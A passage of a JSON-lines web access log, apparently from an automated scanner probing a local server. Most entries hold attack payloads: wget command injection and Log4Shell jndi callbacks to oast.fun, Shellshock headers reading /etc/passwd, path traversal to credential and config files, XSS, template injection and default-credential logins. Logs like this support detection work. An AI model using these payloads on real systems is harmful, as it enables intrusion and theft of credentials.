+0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fca2u0eosmpv1jhs80ca0uzxgkttnzcpqd.oast.fun%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/flip/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /virtualems/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbconsole/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/stats HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"username=${jndi:ldap://${hostName}.ca2u0eosmpv1jhs80ca0fw3nquxagfm3g.oast.fun/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/15 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=ca2u0eosmpv1jhs80ca0cs8pwjzpexwpa.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"echo\x0D\x0Aecho\x0D\x0Acat /etc/passwd 2>&1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error3?msg=30&data=';alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/16 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Forms/rpAuth_1?id=
HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=ca2u0eosmpv1jhs80ca03sqhqyu961b9f.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status/status.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.288","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 